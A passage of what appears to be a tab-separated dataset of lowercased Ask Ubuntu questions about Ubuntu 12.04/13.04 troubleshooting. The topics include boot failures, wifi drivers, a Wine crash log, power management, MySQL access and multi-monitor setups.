: playback 0 [ 0 % ] [ -34.50db ] [ off ] capture [ off ] simple mixer control 'mono output select',0 capabilities : enum items : 'mix ' 'mic' item0 : 'mix' simple mixer control 'capture',0 capabilities : cvolume cswitch cswitch-joined penum capture channels : front left - front right limits : capture 0 - 15 front left : capture 3 [ 20 % ] [ 4.50db ] [ on ] front right : capture 3 [ 20 % ] [ 4.50db ] [ on ] simple mixer control 'mix',0 capabilities : cswitch cswitch-exclusive penum capture exclusive group : 0 capture channels : front left - front right front left : capture [ off ] front right : capture [ off ] simple mixer control 'mix mono',0 capabilities : cswitch cswitch-exclusive penum capture exclusive group : 0 capture channels : front left - front right front left : capture [ off ] front right : capture [ off ] simple mixer control 'alternate level to surround out',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ on ] simple mixer control 'downmix lfe and center to front',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'downmix surround to front',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'external amplifier',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ on ] simple mixer control 'input source select',0 capabilities : enum items : 'input1 ' 'input2' item0 : 'input1' simple mixer control 'input source select',1 capabilities : enum items : 'input1 ' 'input2' item0 : 'input1' simple mixer control 'smart 5.1 select',0 capabilities : enum items : 'linein mic1 ' 'linein mic1 mic3 ' 'surr lfe/c mic3 ' 'linein lfe/c mic3 ' 'linein mic2 ' 'linein mic2 mic1 ' 'surr lfe mic1 ' 'surr lfe mic1 mic2' item0 : 'linein mic1' pacmd dump-volumes welcome to pulseaudio ! use `` help '' for usage information . > > > unknown command : dump-volumes pactl info server string : unix : /home/malapradej/.pulse/41107d39d55f7c9b285cb21700000010-runtime/native library protocol version : 26 server protocol version : 26 is local : yes client index : 846 tile size : 65496 user name : malapradej host name : malaprade-desktop server name : pulseaudio server version : 1.1 default sample specification : s16le 2ch 44100hz default channel map : front-left , front-right default sink : alsa_output.pci-0000_00_11.5.analog-stereo default source : alsa_input.pci-0000_00_11.5.analog-mono cookie : 3fe2 : df8f
347669	shut down by closing notebook	as a matter of fact im quite new to ubuntu and spent the last 2 hours finding a possibility/adjustment to `` shut down '' my laptop when i close it ? ? maybe someone can help me with my little problem . greetings
347670	b43 not ( always ) starting up correctly	i am getting the error message : b43-phy0 error : found unsupported phy ( analog 15 , type 15 , revision 255 ) which would indicate a driver problem . however , this seems not to be the case since it will start sometimes , i need to reboot a few times to get it running . to me it seems it tries to start while the device is still initializing , however i have no idea how to adjust the timing .
347671	ubuntu wont boot from usb ( 12.04.3 )	so , for a first time try with a usb boot drive , i used the recommended ubuntu 12.04.3 version . after using the pen drive linux usb installer to install ubuntu onto it , i restarted my pc and changed the boot priorities in the bios so that it boots from the usb first , however after many attempts my pc just boots straight into win 8 . the board i have is the asus m4a79xtd evo ( am3 ) . any help will be much appreciated , thanks
347682	ubuntu gnome 13.04 & thinkpad l530 : brightness buttons	good day everyone , as mentioned i 'm using my thinkpad l530 running ubuntu gnome 13.04 as of late . i have two basic problems at the moment : toggeling the screen brightness with fn+f8 /fn+f9 only shows 'toggle brightness'-popup and a bar of the actual brightness for a few seconds but tapping fn+8/9 does not actually increase/decrease the brightness can anyone help me with this ?
347683	installing 64bit zeiss axiovision software with wine in ubuntu 13.04	i am trying to install zeiss axiovision software with wine-1.6 on ubuntu 13.04 64bit . i am an academic user so i can get the software for free from zeiss , here i have a fresh install of wine from the ppa . i am able to download the software and when i attempt to install it i get this output : wine axiovisionle_se64_491_sp1.exe fixme : ole : coinitializesecurity ( 0x33ed88 , -1 , ( nil ) , ( nil ) ,6,2 , ( nil ) ,8192 , ( nil ) ) - stub ! fixme : storage : create_storagefile storage share mode not implemented . err : richedit : readstylesheet skipping optional destination err : richedit : readstylesheet skipping optional destination err : richedit : readstylesheet skipping optional destination err : richedit : readstylesheet skipping optional destination err : richedit : readstylesheet skipping optional destination failed to load dll c : \program files ( x86 ) \common files\microsoft shared\vba\vba6\apc64.dll failed to load dll c : \windows\syswow64\msexcl35.dll failed to load dll c : \windows\syswow64\msjet35.dll failed to load dll c : \windows\syswow64\msjt4jlt.dll failed to load dll c : \windows\syswow64\msltus35.dll failed to load dll c : \windows\syswow64\mspdox35.dll failed to load dll c : \windows\syswow64\msrd2x35.dll failed to load dll c : \windows\syswow64\mstext35.dll failed to load dll c : \windows\syswow64\msxbse35.dll failed to load dll c : \program files ( x86 ) \common files\microsoft shared\dao\dao350.dll failed to load dll c : \windows\syswow64\fm20.dll fixme : msi : load_progid unknown parent progid l '' zidvctmi2.zimicanalyzerintermediatetu.1 '' fixme : msi : load_progid unknown parent progid l '' zidvctmi2.zimicfocusstabilizerperiodc.1 '' fixme : msi : load_progid unknown parent progid l '' zidvctmi2.zimicfotointermediatetubect.1 '' fixme : msi : load_progid unknown parent progid l '' zidvfastacq.ziacquisitionrecordingctrl.1 '' the installer actually installs the program but when you try to run it with 'wine axiovs40x64.exe ' this is the error it gives : unhandled exception : unimplemented function oleaut32.dll.oleloadpicturefile called in 64-bit code ( 0x000000007b84980a ) . register dump : rip:000000007b84980a rsp:000000000023e170 rbp:000000000023e3e0 eflags:00000202 ( - -- i - - - ) rax:000000000023e1b0 rbx:000000000023e190 rcx:000000000023e190 rdx:00007f88a477fee6 rsi:000000000023e310 rdi:000000000023e1b0 r8:0000000000000002 r9:000000000023e310 r10:000000000023df78 r11:00007f88a47bbd40 r12:0000000001d15fa0 r13:0000000000000110 r14:0000000001d15fa8 r15:0000000000000000 stack dump : 0x000000000023e170 : 000000000023e190 ffffffffffffff00 0x000000000023e180 : 0000000000000000 0000000000000000 0x000000000023e190 : 0000000180000100 0000000000000000 0x000000000023e1a0 : 000000007b84980a 0000000000000002 0x000000000023e1b0 : 00007f88a05fb680 00007f88a05fb8d8 0x000000000023e1c0 : 0000ff0000000000 000000000023e2c0 0x000000000023e1d0 : 0000000000000000 000000000023e500 0x000000000023e1e0 : 000000000023e3e0 0000000001d15fa0 0x000000000023e1f0 : 0000000000000110 0000000001d15fa8 0x000000000023e200 : 0000000000000000 00007f88a43b38a9 0x000000000023e210 : 0000000001cffdc4 000000000023e500 0x000000000023e220 : 000000000023e500 000000000023e3e0 backtrace : = > 0 0x000000007b84980a in kernel32 ( +0x2980a ) ( 0x000000000023e3e0 ) 1 0x00007f88a05fb62a __wine_unwind_trampoline+0x5c9 ( ) in oleaut32 ( 0x000000000023e3e0 ) 2 0x00007f88a0531ad7 in oleaut32 ( +0x1ad6 ) ( 0x000000000023e3e0 ) 3 0x00000000023372ae in zidlg ( +0x372ad ) ( 0x000000000023e3e0 ) 4 0x00000000023371f7 in zidlg ( +0x371f6 ) ( 0x000000000023e3e0 ) 5 0x0000000002336a7f in zidlg ( +0x36a7e ) ( 0x000000000023e499 ) 6 0x0000000002336348 in zidlg ( +0x36347 ) ( 0x0000000000010090 ) 7 0x000000000230d1e8 in zidlg ( +0xd1e7 ) ( 0x0000000000010090 ) 8 0x000000000233781f in zidlg ( +0x3781e ) ( 0x0000000000010090 ) 9 0x00007f88a1a5f5d3 in user32 ( +0xaf5d2 ) ( 0x000000000023e698 ) 10 0x00007f88a1a62011 in user32 ( +0xb2010 ) ( 0x0000000000000000 ) 11 0x00007f88a19e392a defdlgprocw+0xd9 ( ) in user32 ( 0x0000000000000110 ) 12 0x00007f88a1a5f490 in user32 ( +0xaf48f ) ( 0x000000000003008e ) 13 0x00007f88a1a61a25 in user32 ( +0xb1a24 ) ( 0x00007fffff7e8000 ) 14 0x00007f88a1a1e52b in user32 ( +0x6e52a ) ( 0x0000000000000000 ) 15 0x00007f88a1a258eb in user32 ( +0x758ea ) ( 0x000000000023ea28 ) 16 0x00007f88a1a2611b sendmessagew+0xaa ( ) in user32 ( 0x000000000000010d ) 17 0x00007f88a19ea015 in user32 ( +0x3a014 ) ( 0x000000000000010d ) 18 0x00007f88a19ead3d createdialogindirectparamaorw+0x8c ( ) in user32 ( 0x000000000260a030 ) 19 0x00007f88a19eadbb createdialogindirectparamw+0x1a ( ) in user32 ( 0x000000000260a030 ) 20 0x000000000232188a in zidlg ( +0x21889 ) ( 0x000000000260a030 ) 21 0x0000000002337382 in zidlg ( +0x37381 ) ( 0x000000000023f1c0 ) 22 0x0000000002336fec in zidlg ( +0x36feb ) ( 0x000000000023f1c0 ) 23 0x0000000140006524 in axiovs40x64 ( +0x6523 ) ( 0x000000000023f1c0 ) 24 0x0000000140004247 in axiovs40x64 ( +0x4246 ) ( 0x000000000023f1c0 ) 25 0x0000000140001e8e in axiovs40x64 ( +0x1e8d ) ( 0x000000000023fb10 ) 26 0x0000000140020a84 in axiovs40x64 ( +0x20a83 ) ( 0x0000000140020acc ) 27 0x000000007b873dd4 in kernel32 ( +0x53dd3 ) ( 0x0000000140020acc ) 28 0x00007f88a43c61eb call_thread_func+0x6a ( ) in ntdll ( 0x00007fff28eae270 ) 29 0x00007f88a43bf6da rtlraiseexception+0x7d ( ) in ntdll ( 0x00007fff28eae270 ) 30 0x00007f88a43902a6 in ntdll ( +0x402a5 ) ( 0x00007fff28eae270 ) 31 0x00007f88a4e3d373 wine_call_on_stack+0x12 ( ) in libwine.so.1 ( 0x00007fff28eae270 ) 32 0x00007f88a4e3d3c9 wine_switch_to_stack+0x8 ( ) in libwine.so.1 ( 0x00007fffff7ef000 ) 33 0x00007f88a4396064 ldrinitializethunk+0x433 ( ) in ntdll ( 0x00007fffff7ef000 ) 34 0x000000007b87a3a5 __wine_kernel_init+0x904 ( ) in kernel32 ( 0x00007fff28eaf0e0 ) 35 0x00007f88a43969d4 __wine_process_init+0x273 ( ) in ntdll ( 0x0000000000000400 ) 36 0x00007f88a4e3b2e5 wine_init+0x2c4 ( ) in libwine.so.1 ( 0x0000000000000400 ) 37 0x000000007bf00fc1 main+0xf0 ( ) in < wine-loader > ( 0x0000000000000002 ) 38 0x00007f88a4650ea5 __libc_start_main+0xf4 ( ) in libc.so.6 ( 0x0000000000000000 ) 39 0x000000007bf010e1 _start+0x28 ( ) in < wine-loader > ( 0x0000000000000000 ) 0x000000007b84980a : modules : module address debug info name ( 121 modules ) pe a00000- be5000 deferred ziimg pe e10000- ed7000 deferred zidev pe ff0000- 10f3000 deferred ziacmd pe 1210000- 1640000 deferred zidata pe 1eb0000- 228b000 deferred zictrl pe 2300000- 2644000 export zidlg elf 7b800000- 7bc73000 dwarf kernel32 < elf > \-pe 7b820000- 7bc73000 \ kernel32 elf 7be00000- 7c103000 dwarf < wine-loader > pe 140000000- 14005c000 export axiovs40x64 pe 180000000- 18028e000 deferred ziapp elf 7f8894622000- 7f88948d2000 deferred gdiplus < elf > \-pe 7f8894630000- 7f88948d2000 \ gdiplus elf 7f88948d2000- 7f8894b10000 deferred msvcr100 < elf > \-pe 7f88948e0000- 7f8894b10000 \ msvcr100 elf 7f8894b10000- 7f8894dd0000 deferred msvcrt < elf > \-pe 7f8894b30000- 7f8894dd0000 \ msvcrt elf 7f8894dd0000- 7f88950bb000 deferred msvcp100 < elf > \-pe 7f8894e00000- 7f88950bb000 \ msvcp100 elf 7f88950bb000- 7f88952cf000 deferred gnome-keyring-pkcs11.so elf 7f88952cf000- 7f88954d3000 deferred libgpg-error.so.0 elf 7f88954d3000- 7f88956ed000 deferred libresolv.so.2 elf 7f88956ed000- 7f88958f1000 deferred libkeyutils.so.1 elf 7f88958f1000- 7f8895b35000 deferred libdbus-1.so.3 elf 7f8895b35000- 7f8895d49000 deferred libp11-kit.so.0 elf 7f8895d49000- 7f8895f5a000 deferred libtasn1.so.3 elf 7f8895f5a000- 7f88961d8000 deferred libgcrypt.so.11 elf 7f88961d8000- 7f88963e0000 deferred libkrb5support.so.0 elf 7f88963e0000- 7f88965e4000 deferred libcom_err.so.2 elf 7f88965e4000- 7f889680d000 deferred libk5crypto.so.3 elf 7f889680d000- 7f8896adb000 deferred libkrb5.so.3 elf 7f8896adb000- 7f8896cec000 deferred libavahi-client.so.3 elf 7f8896cec000- 7f8896ef8000 deferred libavahi-common.so.3 elf 7f8896ef8000- 7f88971b4000 deferred libgnutls.so.26 elf 7f88971b4000- 7f88973f2000 deferred libgssapi_krb5.so.2 elf 7f88973f2000- 7f8897652000 deferred libcups.so.2 elf 7f8897652000- 7f8897897000 deferred winspool < elf > \-pe 7f8897660000- 7f8897897000 \ winspool elf 7f8897897000- 7f8897b85000 deferred comdlg32 < elf > \-pe 7f88978a0000- 7f8897b85000 \ comdlg32 elf 7f8897b85000- 7f8897dd4000 deferred avifil32 < elf > \-pe 7f8897b90000- 7f8897dd4000 \ avifil32 elf 7f8897dd4000- 7f8898000000 deferred msvfw32 < elf > \-pe 7f8897de0000- 7f8898000000 \ msvfw32 elf 7f889c201000- 7f889c414000 deferred msimg32 < elf > \-pe 7f889c210000- 7f889c414000 \ msimg32 elf 7f889c414000- 7f889c640000 deferred msacm32 < elf > \-pe 7f889c420000- 7f889c640000 \ msacm32 elf 7f889c640000- 7f889c902000 deferred winmm < elf > \-pe 7f889c650000- 7f889c902000 \ winmm elf 7f889cb15000- 7f889cd3c000 deferred imm32 < elf > \-pe 7f889cb20000- 7f889cd3c000 \ imm32 elf 7f889ce87000- 7f889d1e6000 deferred actxprxy < elf > \-pe 7f889cec0000- 7f889d1e6000 \ actxprxy elf 7f889d22c000- 7f889d465000 deferred uxtheme < elf > \-pe 7f889d230000- 7f889d465000 \ uxtheme elf 7f889d465000- 7f889d66b000 deferred libxfixes.so.3 elf 7f889d66b000- 7f889d876000 deferred libxcursor.so.1 elf 7f889d876000- 7f889da86000 deferred libxi.so.6 elf 7f889da86000- 7f889dc89000 deferred libxcomposite.so.1 elf 7f889dc89000- 7f889de93000 deferred libxrandr.so.2 elf 7f889de93000- 7f889e09d000 deferred libxrender.so.1 elf 7f889e09d000- 7f889e2a3000 deferred libxxf86vm.so.1 elf 7f889e2a3000- 7f889e4a6000 deferred libxinerama.so.1 elf 7f889e4a6000- 7f889e6ac000 deferred libxdmcp.so.6 elf 7f889e6ac000- 7f889e8b0000 deferred libxau.so.6 elf 7f889e8b0000- 7f889eace000 deferred libxcb.so.1 elf 7f889eace000- 7f889ecd3000 deferred libuuid.so.1 elf 7f889eced000- 7f889ef09000 deferred libice.so.6 elf 7f889ef09000- 7f889f243000 deferred libx11.so.6 elf 7f889f243000- 7f889f455000 deferred libxext.so.6 elf 7f889f455000- 7f889f65d000 deferred libsm.so.6 elf 7f889f65d000- 7f889f8f6000 deferred winex11 < elf > \-pe 7f889f670000- 7f889f8f6000 \ winex11 elf 7f889f9ba000- 7f889fbe3000 deferred libexpat.so.1 elf 7f889fbe3000- 7f889fe1d000 deferred libfontconfig.so.1 elf 7f889fe1d000- 7f88a00ba000 deferred libfreetype.so.6 elf 7f88a00ba000- 7f88a02e2000 deferred libtinfo.so.5 elf 7f88a02e2000- 7f88a0503000 deferred libncurses.so.5 elf 7f88a0503000- 7f88a087e000 dwarf oleaut32 < elf > \-pe 7f88a0530000- 7f88a087e000 \ oleaut32 elf 7f88a087e000- 7f88a0b11000 deferred rpcrt4 < elf > \-pe 7f88a0890000- 7f88a0b11000 \ rpcrt4 elf 7f88a0b11000- 7f88a0e91000 deferred ole32 < elf > \-pe 7f88a0b40000- 7f88a0e91000 \ ole32 elf 7f88a0e91000- 7f88a1193000 deferred comctl32 < elf > \-pe 7f88a0ea0000- 7f88a1193000 \ comctl32 elf 7f88a1193000- 7f88a13ac000 deferred version < elf > \-pe 7f88a11a0000- 7f88a13ac000 \ version elf 7f88a13ac000- 7f88a162f000 deferred advapi32 < elf > \-pe 7f88a13c0000- 7f88a162f000 \ advapi32 elf 7f88a162f000- 7f88a1991000 deferred gdi32 < elf > \-pe 7f88a1640000- 7f88a1991000 \ gdi32 elf 7f88a1991000- 7f88a1d32000 dwarf user32 < elf > \-pe 7f88a19b0000- 7f88a1d32000 \ user32 elf 7f88a1d32000- 7f88a1fc3000 deferred shlwapi < elf > \-pe 7f88a1d40000- 7f88a1fc3000 \ shlwapi elf 7f88a1fc3000- 7f88a2426000 deferred shell32 < elf > \-pe 7f88a1fe0000- 7f88a2426000 \ shell32 elf 7f88a2426000- 7f88a2639000 deferred psapi < elf > \-pe 7f88a2430000- 7f88a2639000 \ psapi elf 7f88a2639000- 7f88a284f000 deferred libz.so.1 elf 7f88a284f000- 7f88a2abb000 deferred dbghelp < elf > \-pe 7f88a2860000- 7f88a2abb000 \ dbghelp elf 7f88a2abb000- 7f88a2cf8000 deferred mscoree < elf > \-pe 7f88a2ac0000- 7f88a2cf8000 \ mscoree elf 7f88a2cf8000- 7f88a2f05000 deferred libnss_files.so.2 elf 7f88a2f05000- 7f88a3111000 deferred libnss_nis.so.2 elf 7f88a3111000- 7f88a332b000 deferred libnsl.so.1 elf 7f88a332b000- 7f88a3534000 deferred libnss_compat.so.2 elf 7f88a3c15000- 7f88a3e2b000 deferred libgcc_s.so.1 elf 7f88a3e2b000- 7f88a4130000 deferred libm.so.6 elf 7f88a4130000- 7f88a4338000 deferred librt.so.1 elf 7f88a4338000- 7f88a462c000 dwarf ntdll < elf > \-pe 7f88a4350000- 7f88a462c000 \ ntdll elf 7f88a462f000- 7f88a49f7000 dwarf libc.so.6 elf 7f88a49f7000- 7f88a4bfb000 deferred libdl.so.2 elf 7f88a4bfb000- 7f88a4e18000 deferred libpthread.so.0 elf 7f88a4e33000- 7f88a51d7000 dwarf libwine.so.1 elf 7f88a51d9000- 7f88a53fe000 deferred ld-linux-x86-64.so.2 elf 7fff28f72000- 7fff28f73000 deferred [ vdso ] .so threads : process tid prio ( all id : s are in hex ) 0000000e services.exe 0000001e 0 0000001d 0 00000018 0 00000016 0 00000014 0 00000010 0 0000000f 0 00000012 winedevice.exe 0000001c 0 00000019 0 00000017 0 00000013 0 0000001a plugplay.exe 00000020 0 0000001f 0 0000001b 0 00000021 explorer.exe 00000025 0 00000022 0 00000023 ( d ) c : \program files\carl zeiss vision\axiovision 4\axiovs40x64.exe 00000034 0 00000029 0 00000028 0 00000027 0 00000026 0 00000024 0 < == 0000002a rpcss.exe 00000033 0 00000032 0 00000031 0 00000030 0 0000002f 0 0000002e 0 0000002c 0 0000002b 0 system information : wine build : wine-1.6 platform : x86_64 host system : linux host version : 3.8.0-30-generic does anyone have any suggestions about how to proceed ? i will try to find the dll files from another installation of windows 64bit . any commentary is welcome .
347685	lubuntu power management : random shut down	i 'm experiencing quite a big issue in lubuntu . i have an asus ux31 series with more or less 4 hours battery life . my problem is that it badly dies with 30/35 % of battery remaining . just like that . even chrome does n't remember its state ( open tabs ) or sometimes my zsh history is also corrupted . my xfce-power-management-4 config should be alright : critical battery rate should hibernate critical battery rate is at 10 % but it seems never to be reached ( so i do n't think it 's a matter of signal sent too late as i 've read in some other posts ) hibernation works very well when triggered manually or when the laptop is plugged in it seems like at some point , the battery acts as if disconnected from the laptop , but i think ( and hope ) it is a software issue since it always happens at around the same moment in the battery life . any idea where should i search to solve this issue ?
347687	how can i enable and keep wifi without restart networking service in ubuntu server ?	i 've just installed ubuntu 13.04 x64 server , and i 've been able to connect to my wi-fi network during the installation process . however , since i boot it , two messages appear ( both `` waiting for network configuration ... '' and `` waiting up to 60 more seconds for network configuration ... '' ) and there is no way to connect with the router . i 've googled that issue , also i 've opened the /etc/network/interfaces configuration file to review the settings , and in fact , both id and network password are saved properly . the only way to get it connected is using the commands sudo service networking stop sudo service networking start or using sudo service networking restart ( it causes the same result ) . so , the only way to solve this problem is restarting the service , but i suppose that there is an automatic way to do it . i 've installed ubuntu desktop 13.04 x64 in the same computer , it detects the network ssid immediatly , keeps the wi-fi settings and it connects to the router without any restarting or strange tweaking , so i 've wondered why with the server edition it 's difficult . the best scenario is using a specific server os because i need it to perform some web service and of course you know that is enough with a console access , to use ssh , ftp and so on . thanks so much .
347690	windows 7 along side 13.04 boots to gnu grub and then black screen	i have a gateway with intel 8830 , intel hd graphics , 4 gb ddr3 memory , 320 gb hdd , with windows 7 installed ( originally came with windows 8 , since removed ) . i am able to boot into the usd live 13.04 with no problem . installation was completed fine , but upon rebooting using gnu grub , ubuntu boots to a black screen with a blinking cursor . if i try it in secure mode , it also hangs at something to do with a `` clocksource ... '' can you help me to boot it into ubuntu ? windows works fine .
347691	12.04 on intel celeron nuc . ca n't boot from drive if i move it to another	i have two identical nucs , boot from usb cd , install the os , works fine . install was not adding any drivers or 3rd party apps . take the same msata drive to the other nuc , and it wo n't boot . i have tried 32 and 64 bit . checked to make the sure the drive is seen in the bios ( it is ) . have tried uncecking in the bios uefi and legacy , to no avail . i have had two other people confirm the same thing on their own systems .
347693	system crashes and reboots randomly while browsing	please , help me finding out what 's happening ! i 'm totally clueless . i ca n't seem to find the cause of the reboots in dmesg or any other log . basically , my system reboots randomly while browsing , right after clicking on a link . sometimes i can browse for hours and sometimes for a few minutes . it does n't matter which browser i 'm using , that 's why i ran a memtest , but my ram is apparently good . i have n't always had this problem . it started out some days ago ( maybe almost a month ago ) , but i do n't know exactly when because i have n't ever done anything particular to possibily damage my system . so either it was a package upgrade , or a kernel upgrade , or even nvidia drivers upgrade , i just ca n't tell . here 's some info about my system : ubuntu is installed on disk1 ( ssd ) , its journal is on its own partition on disk4 , while /var and /tmp are on disk4 as bind . a virtual swap is present too . lsb_release -a lsb version : core-2.0-amd64 : core-2.0-noarch : core-3.0-amd64 : core-3.0-noarch : core-3.1-amd64 : core-3.1-noarch : core-3.2-amd64 : core-3.2-noarch : core-4.0-amd64 : core-4.0-noarch distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring /etc/fstab uuid=2b0da3e1-76d3-4dda-be4c-8dee07beb485 / ext4 discard , noatime , errors=remount-ro 0 1 uuid=68ce9c0c-d6ab-4f3a-bdfc-37e33ae8856f /media/disk2 ext4 defaults , errors=remount-ro , relatime 0 1 uuid=7071a8f4-95a1-4fc9-956f-302baf8ccbea /media/sdisk3 ext4 defaults , errors=remount-ro , relatime 0 1 uuid=36539e72-9101-4663-a7d0-cd59098a5147 /media/disk4 ext4 defaults , errors=remount-ro , relatime 0 1 /media/disk4/var /var bind defaults , bind , noatime , mode=0755 0 0 /media/disk4/tmp /tmp bind defaults , bind , noatime , mode=1777 0 0 /media/disk4/swap/2048mb.swap none swap sw 0 0 /dev/sr0 /media/dvd udf , iso9660 user , noauto , exec , utf8 0 0 lshw -short h/w path device class description ================================================= system system product name ( to be filled by o.e.m . ) /0 bus a8r-mvp /0/0 memory 64kib bios /0/4 processor amd athlon ( tm ) 64 x2 dual core processor 4800+ /0/4/5 memory 128kib l1 cache /0/4/6 memory 1mib l2 cache /0/36 memory 4gib system memory /0/36/0 memory 1gib dimm ddr synchronous 333 mhz ( 3,0 ns ) /0/36/1 memory 1gib dimm ddr synchronous 333 mhz ( 3,0 ns ) /0/36/2 memory 1gib dimm ddr synchronous 333 mhz ( 3,0 ns ) /0/36/3 memory 1gib dimm ddr synchronous 333 mhz ( 3,0 ns ) /0/100 bridge rs480/rs482/rs485 host bridge /0/100/2 bridge rs480 pci-x root port /0/100/2/0 display g96 [ geforce 9500 gt ] /0/100/1a bridge m5249 htt to pci bridge /0/100/1a/11 multimedia sb x-fi /0/100/1a/12 storage vt6421 ide/sata controller /0/100/1a/13 bus tsb43ab22a ieee-1394a-2000 controller ( phy/link ) [ iohci-lynx ] /0/100/1a/14 eth0 network 88e8001 gigabit ethernet controller /0/100/1c bus usb 1.1 controller /0/100/1c.1 bus usb 1.1 controller /0/100/1c.2 bus usb 1.1 controller /0/100/1c.3 bus usb 2.0 controller /0/100/1e bridge m1575 south bridge /0/100/1e.1 bridge m7101 power management controller [ pmu ] /0/100/1f storage m5229 ide /0/100/1f.1 storage uli m5288 sata /0/101 bridge k8 [ athlon64/opteron ] hypertransport technology configuration /0/102 bridge k8 [ athlon64/opteron ] address map /0/103 bridge k8 [ athlon64/opteron ] dram controller /0/104 bridge k8 [ athlon64/opteron ] miscellaneous control /0/1 scsi0 storage /0/1/0.0.0 /dev/sda disk 120gb samsung ssd 840 /0/1/0.0.0/1 /dev/sda1 volume 111gib ext4 volume /0/2 scsi1 storage /0/2/0.0.0 /dev/sdb disk 320gb wdc wd3200jd-22k /0/2/0.0.0/1 /dev/sdb1 volume 10236mib windows ntfs volume /0/2/0.0.0/2 /dev/sdb2 volume 288gib ext4 volume /0/3 scsi2 storage /0/3/0.0.0 /dev/sdc disk 500gb wdc wd5000aakx-0 /0/3/0.0.0/1 /dev/sdc1 volume 465gib ext4 volume /0/5 scsi3 storage /0/5/0.0.0 /dev/sdd disk 320gb wdc wd3200jd-22k /0/5/0.0.0/1 /dev/sdd1 volume 400mib linux filesystem partition /0/5/0.0.0/2 /dev/sdd2 volume 297gib ext4 volume /0/6 scsi4 storage /0/6/0.0.0 /dev/cdrom disk ihas524 b /0/7 scsi9 storage /0/7/0.0.0 /dev/sde disk officejet 6500 e /0/7/0.0.0/0 /dev/sde disk thank you so much for reading so far ! if you need more info , just tell me .
347694	i 've got some problems on ubuntu 13.04 , any help !	i ca n't set script ( or by any other way through terminal ) for making thresholds for battery charging , also i know that lenovo users provided tp_smapi kernel module which make this issue not considered as an unsolvable problem unless for dell users , also i tried this http : //www.serkey.com/ubuntu-thinkpad-battery-threshold-tool-easy-script-bebzu4.html but it is not working for me , any solutions for controlling thresholds charging by any way ? i think my laptop temperature getting high with no reason which makes it produces extra heat even if the laptop is in its idle state , considering also my trying to use jupiter but it have not effect on the heat also in its power saving plan , so is there a way to make power plan to save the battery power ?
347695	why does n't dock show on fresh 13.04 ?	i just put ubuntu 13.4 on a dell optiplex 170l with pentium 4 and 1gb of ram . the installation went fine but it does not show the dock or the top bar .
347697	installing apps programs etc	im new to ubuntu . i 'm trying to install apps etc , but it keeps asking for authentication . i do n't where or how to create a password . i 've had a look in system settings but no joy
347698	vps management - setup	is there maybe some tip on how to manage and setup xen server ? i have linux ubuntu 12.04 64bit preinstalled and do n't have a clue how to setup a website - in what folder do i need to upload files ? also , how come , that there is no visual interface like in desktop versions , so i can connect throught remote ? cheers
347700	how do i download drivers for broadcom 4311 802.11 from another pc and install them on 13.04 ?	how do i download drivers for broadcom 4311 802.11 from another pc and install them on 13.04 ?
347704	how to resolve excessive cpu usage ?	i just installed ubuntu 13.04 on my brand new notebook and pu usage is insane . i 'm a new linux user . can somebody help me ? specs and system monitor :
347705	how users will to get ubuntu for phones ?	i 'm pantech 's vega r3 user . this phone matches to highend spec for ubuntu for phone . how you will provide for android phone like this ? cwm or recovery installable package ? or through oem or carrier ota ? i wish more fastly come ubuntu on my phone . thanks .
347710	no matter what i researched and did i ca n't connect to my mysql server	ubuntu installed mysql for me through lamp . when i connect with ssh i can login with the root user but not the user i created myself . when i use heidisql i ca n't login with anything . i ran these commands mysql -u root -p create database something ; grant all on something . * to something @ ' % ' identified by 'password ' ; flush privileges ; sudo service mysql restart sudo iptables -a input -i p3p1 -p tcp -- destination-port 3306 -j accept edit : my.conf : http : //pastebin.com/zwhj6bun
347711	how to add permissions to files installed by dpkg-buildpackage or debuild	i build a package from my own source using dh_make and dpkg-buildpackage . the install-file in /debian specifies the destinations for the project files . to make the installed program work , they need to be executable / have execution permissions with chmod . in particular it is about a python script and a .desktop-file . how do i set those permissions in setup ? by only copying them to their destinations it is not done . it would be ok for me if i could trigger a command at the end of setup , or something like this , but do n't know how to include this .
347712	ubuntu 12.04 usb boot stuck	i have windows and ubuntu ( installed with windows installer ) on this computer and i 'm trying to boot ubuntu 12.04 desktop amd64 with a live usb as the partition ubuntu is on is too small . the boot worked fine on another computer , but for some reason this computer is getting stuck indefinitely at `` loading operating system . . . '' this computer does n't have a cdrom , so usb is the only option . checked the iso to ensure it was n't corrupt . i have tried several different programs to make the live usb , with the same results each time . i went into the bios and changed the boot order to recognize the usb first , same results . when windows was installed , it was booted off of a usb without any problems . any ideas as to why it just wo n't load ubuntu ?
347713	grub error unknown filesystem - really need help !	i have a windows 8 pc and i installed ubuntu onto it in dual boot , i made a recovery disk and deleted the ubuntu partition but now i get `` grub error unknown filesystem '' when booting from the disk and booting normally , please can someone help me i 'm only 13 and if my parents find out they wo n't be very happy - i have a windows 8 laptop ( my dads ) and a windows 7 pc ( my mums ) i can use to do something with ? please i really need help on how to get grub working again so i can get my pc booting again . thanks
347721	host two separate web servers on the same ip	i currently have a ubuntu web server with apache setup and running wonderfully , i want to do two things , i want to setup two more boxes which would be on the same wan address but of course have separate local addresses . so say i have www.example.com as the main server i also want test.example.com on a different box and fun.example.com on a third . how would i accomplish this ?
347722	quad screen unmirroring causes ubuntu to crash	i installed ubuntu 13.04 on my optiplex 970 box . i have four monitors , two on the motherboard video and two on a plugin video card . when ubuntu comes up , i see the screen mirrored on the two motherboard video monitors , and black on the other two monitors . i want to switch to an unmirrored configuration using all four monitors . when i go into the system settings and uncheck the mirrored box , it detects all four monitors . but when i click apply , ubuntu crashes back to the password screen . how do i keep it from crashing ? new video driver ? some system setting ? i have so little knowledge about ubuntu that i do n't even know how to tell what kind of video cards i have .
347725	ca n't upload pics from cd ?	i recently installed ubuntu , so i am still a newbie . but i can not upload any pictures from a disc . i can play audio and dvd disc 's no problem . i have tried multiple discs with pictures on them and still get the same issue . ubuntu recognizes that their is a disc and how many megabytes are used on the disc but it shows nothing on the disc . please help ! very frustrating !
347729	what happened to snow ?	in kubuntu 12.04 ( and maybe 12.10 , i think ) there was a neat eyecandy effect you could enable in `` desktop effects '' under system settings that made snow fall on the desktop . in 13.04 , it is n't there ! has it been dropped ? for what reason is it not appearing ? it is/was an entertaining and visually useful desktop effect .
347740	trouble restarting ubuntu after installation on mac	after i complete the installation and click `` restart now '' ubuntu freezes and does n't restart or anything . any ideas ?
